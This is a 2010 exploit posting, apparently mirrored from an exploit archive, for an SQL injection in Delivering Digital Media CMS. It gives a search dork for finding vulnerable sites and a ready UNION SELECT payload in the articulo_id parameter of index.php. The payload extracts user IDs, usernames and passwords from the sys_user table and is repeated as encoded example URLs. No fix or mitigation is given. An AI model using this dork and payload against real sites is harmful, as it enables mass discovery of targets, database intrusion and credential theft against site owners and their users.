Home / os / win7

Delivering Digital Media CMS SQL Injection Vulnerability

Posted on 01 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Delivering Digital Media CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================== Delivering Digital Media CMS SQL Injection Vulnerability ======================================================== # Title: Delivering Digital Media CMS SQL Injection Vulnerability # EDB-ID: # CVE-ID: () # OSVDB-ID: () # Author: Dr.0rYX and Cr3w-DZ # Published: # Verified: # Download Exploit Code # Download N/A N.A.S.T ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] Delivering Digital Media CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de&lt;mailto:vx3@hotmail.de&gt; &amp; Cr3w@hotmail.de&lt;mailto:Cr3w@hotmail.de&gt; ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.delivering.info [+] script : Delivering Digital Media CMS [+] Download : http://www.delivering.info/contacto/delivering-argentina.php (sell script) [+] Vulnerability : php SQL injection [+] Dork :inurl:&quot;index.php?edicion_id=&quot; **************************************************************************/ [ Vulnerable File ] http://server/[PATH]/index.php?edicion_id=1&amp;categoria_id=1&amp;origen_id=1&amp;articulo_id=[N.A.S.T ] http://server/index.php?edicion_id=1&amp;categoria_id=1&amp;origen_id=1&amp;articulo_id=[N.A.S.T ] [ Exploit ] http://server/index.php?edicion_id=1&amp;categoria_id=1&amp;origen_id=1&amp;articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- [ GReets ] [+] :claw ,harD , exploit-db.com , ALL HACKERS MUSLIMS EXAMPL:http://[site]/sitio/index.php?edicion_id=1&amp;categoria_id=1&amp;origen_id=1&amp;articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- http://[site]/sitio/index.php?edicion_id=1&amp;categoria_id=1&amp;origen_id=1&amp;articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user-- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP